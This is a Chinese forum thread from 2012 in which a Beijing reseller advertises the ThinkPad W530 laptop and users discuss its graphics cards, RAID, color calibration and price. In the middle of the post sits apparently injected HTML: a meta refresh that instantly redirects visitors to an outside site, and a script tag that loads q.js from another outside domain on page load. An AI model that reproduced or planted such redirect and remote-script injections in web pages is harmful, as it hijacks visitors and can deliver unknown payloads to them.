开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

更快更强的移动工作站,W530四核广色域高清屏高配显卡到货

W530-2LU
美国
i7-3720
2.60G
四核
4G
1*4G
500G
7200转
DVDRW
Nvidia+INTEL
K2000M+4000
2G
15.6寸宽屏
1920*1080
广色域屏
LED背光
蓝牙/摄像头/指纹/9芯电池  12800元
  12999元
(赠送4G原装内存)
库存稳定
货源稳定
翔意推荐

ThinkPad W530移动工作站的不二选择,就在翔意数码,欢迎选购!现在订购赠送价值350元的原装4G内存一条!

翔意推荐搭配固态硬盘使用,造就笔记本中的最强性能。 mSATA SSD介绍请看:http://www.xynbnb.com/thread-1180513-1-1.html

全国翔意店现货销售。

3d d.PNG

3dv j.PNG

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

突然发现有两年没买本了,期间就折腾了2个ipad3/2和一个TP tablet64/3g。看到新的tp线X,T,和xxt都有,就差w没试过了,是不是要入一个呢?
--
台式替代14000的价位,w530,alienware r4x,Rmbp很难选啊。

楼主有钱淫啊  发表于 2012-7-8 09:11
是不是W530?表格里写的是W520

已改  发表于 2012-7-3 23:04
withers 发表于 2012-7-3 20:22
突然发现有两年没买本了,期间就折腾了2个ipad3/2和一个TP tablet64/3g。看到新的tp线X,T,和xxt都有,就 ...

看你干啥用了,不同风格的高性能机型
移动工作站啊
W530-A44
有希望降到11000吗?
EddieFan 发表于 2012-7-3 20:05
看你干啥用了,不同风格的高性能机型

基本没啥用,不喝不赌不嫖不抽,就花钱收藏IT产品了。
--
其实用电脑业就办公(光email备份就20g+),修图(差不多300g+),看片(差不多3tb+)。曾经玩玩游戏,现在老了,玩不动了,目前就wow还在电脑里。这些功能哪怕目前的超级本都够用了。唯一特殊的地方就是常年不同的国家漂着,需要强力的台式替代品,搬家方便。
--
TPW:比较中庸,各方面都照顾到了。不是最轻,但搬得动。显卡不强,但万一要上个D3的,还能抗抗。能放三个硬盘,容量和速度可以兼顾。屏幕还不错。何况从TP570,600一路过来,还有点情结。
--
R4X:游戏机,也能兼顾其他应用。就是太重。而且差不多9年前花了16000买过一个Dell17的,6800显卡,可质量实在是不行。办公室也是一色Dell Latitude,也感觉不爽。
--
RMBP:没货,一代试验品,要不然是最平衡的一款。如果算上把TP换ssd,价格上也有优势。最大缺点就是忧虑不耐操。
--
有时想想其实现在不玩游戏,主流轻薄的就够用了。前天刚把x200翻出来,塞了个ssd,现在用着也凑合。(清了风扇感觉还是不行,啥时候上你们那里加点油,换了硅胶,4年了,差不多都是24x7)。所以,也考虑x230/t,和x1C,后者没底座,有点遗憾,前者价格和性能的完美结合,很心动,要不是手里两个x了,真有点冲动。
--
卡卡,目前心中最佳组合,TPW + win8 Surf,是不是再等6个月,等win8发布了。卡卡
xiaodii 发表于 2012-7-4 03:43
W530-A44
有希望降到11000吗?

K1000高分的的就这个价吧。

k2000>m2000>k1000>m1000, 差不多2000分(相当于650m),1500分,1000分,xxx  发表于 2012-7-4 13:30
K1000与K2000的区别,给普及一下知识吧  发表于 2012-7-4 09:50
期待k2000m的评测
终于等到了。。。
赶快出手吧  
zore777 发表于 2012-7-4 09:34
期待k2000m的评测

1000和2000两款显卡应该差距在30-40%,具体还要到货后再评测。
你好,,,W530怎么没校色仪---和---支持 RAID 吗
耍狮子的 发表于 2012-7-7 09:31
你好,,,W530怎么没校色仪---和---支持 RAID 吗

w520的是顶配的带较色仪,w530可能也是如此。

支持raid的肯定不带光驱,需要官网订购时就指定好要raid的。
够牛叉了,现在电脑都很牛B了,唉。。。我这老古董看来都要换咯!
光驱是不是可以 即插即拔  那种 最好了,,,

耍狮子的 发表于 2012-7-7 18:22
光驱是不是可以 即插即拔  那种 最好了,,,

是的,都支持热插拔的
好机子 我要买2台
奇怪了,显卡怎么会这么差呢?
应该会在6.9的样子吧
zore777 发表于 2012-7-8 20:29
奇怪了,显卡怎么会这么差呢?
应该会在6.9的样子吧

我记得是7.0,不是7.0就是6.9,这个是集显测试的,双显卡在测试的时候不切换独显。
开卖了吗?目前进回来的w530哪一款有颜色校正器?
Cheerful冯 发表于 2012-7-8 22:38 开卖了吗?目前进回来的w530哪一款有颜色校正器?
现货,没色彩校验,不过公司提供更专业的校色服务
2LU有光驱吗?
Cheerful冯 发表于 2012-7-16 12:39
2LU有光驱吗?

有光驱,但是我建议加固态之后吧500g放进光驱位托架里,毕竟光驱不常用
你好,,官网订购W530支持raid的  最低配,,要多少钱呵